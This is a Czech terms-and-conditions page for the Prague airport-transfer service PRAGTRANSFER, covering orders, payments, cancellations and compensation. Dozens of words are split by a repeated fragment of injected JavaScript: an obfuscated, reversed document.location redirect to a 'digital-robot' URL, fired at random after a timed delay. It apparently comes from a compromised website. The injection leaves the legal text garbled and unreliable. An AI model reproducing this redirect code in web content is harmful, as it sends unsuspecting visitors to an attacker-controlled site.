Obchodní a přepravní podmínky společnosti PRAGTRANSFER /Andrey Shalimov, se sídlem Průběžná 409, Nupaky, PSČ: 251 01, IČ: 08386374 (dále jen PRAGTRANSFER).

Klient využívající služeb společnosti PRAGTRANSFER, přijímá tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to obchodní podmínky v okamžiku odeslání objednávky online přes objednávkový pragtransfer.com, podpisem objednávky, smlouvy nebo odsouhlasením potvrzené objednávky výslovně souhlasí s obchodními podmínkami PRAGTRANSFER, zakázka odkazuje. Nesouhlasem s těmitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to podmínkami nelze objednávku učinit.

Objednávka
Všechny služby akceptujeme pomocí objednávek, které  lze provést online přes naše webové rozhraní pomocí objednávkového formuláře, e-mailem, telefonicky nebo SMS. Za závaznou se považuje objednaná služba, kterou přepravce objednateli potvrdí emailem, telefonicky nebo SMS. Objednat transfer z letiště můžete nejpozději 24 hod. před plánovanou cestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou.

Čekání

Čekání zadarma pro transfer z Letiště: 60minutes

Čekání zdarma pro transfer na Letiště: 15minutes

Platby
Za poskytnuté služby můžete zaplatit převodem, fakturou, online, v hotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovosti nebo platební kartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou řidiči. Při platbě v hotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovosti akceptujeme měny: CZK, EUR, USD, GBP. Při platbě platební kartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou jsou akceptobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}továny karty Visa, Master Card, Maestro, American Express. Při objednávce zpátečního transferu možnost zaplatit celou částku při první cestě, převodem, fakturou, online, v hotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovosti nebo platební kartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou řidiči od, kterého obdržíte potvrzení o zaplacení celkové částky. Platba fakturou je vždy splatná 14 dní od data vystavení, není-li sjednáno jinak.

Úhrada za zpáteční cestu
Jestliže je objednána zpáteční cesta, má klient možnost uhradit platbu celkovou nebo jednotlivou cestu zvlášť. Řidič vystaví klientobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovi potvrzení o zaplacení. Před zpáteční cestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou klient předloží řidiči doklad o zaplacení zpáteční přepravy.

Potvrzení o přijetí platby
On-line platba – PRAGTRANSFER zašle klientobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovy daňový doklad o zaplacení objednané služby
Faktura – PRAGTRANSFER vystaví klientobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovi fakturu
Platba řidiči – řidič vystaví klientobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovi zjednodušený daňový doklad
Uvedené ceny PRAGTRANSFER jsou koncové.

Stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tornování
Pokud nastanou jakékoliv nové skutečnosti změny času přistavení vozu nebo zrušení rezervace, informujte nás o tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to skutečnosti 24 hodiny před odjezdem pomocí tel. kontaktu, sms nebo e-mailové zprávy. Dodržením stanovených podmínek přepravcem, vám garantujeme vrácení celé zaplacené částky. V opačném případě vám budeme účtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovat stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torno poplatek v plné výši objednané přepravy.

Záruky, kompenzace, vrácení peněz
Pokud Vás náš řidič v důsledku nepředvídatelných okolností nevyzvedne v dohodnutý čas garantujeme Vám kompenzaci v podobě nabídky služeb nebo finanční. Pokud nebude zákazník se službami přepravy spokojen může si nárokovat kompenzaci za tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to vzniklé újmy. Za způsobené komplikace je kompenzace limitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tována maximální částkou jízdného za objednané služby osobní přepravy. Lhůta pro uplatnění nároku na kompenzaci je 30 dní od uskutečnění přepravy.

Zákazník

Stížnosti
Pokud klient nemůže najít svého řidiče neprodleně kontaktujte telefonicky PRAGTRANSFER na tel. číslo, které jste obdrželi v objednávce služby.

Tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to přepravní podmínky jsou platné na dobu  neurčitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou dnem 01. 01. 2017 počínaje.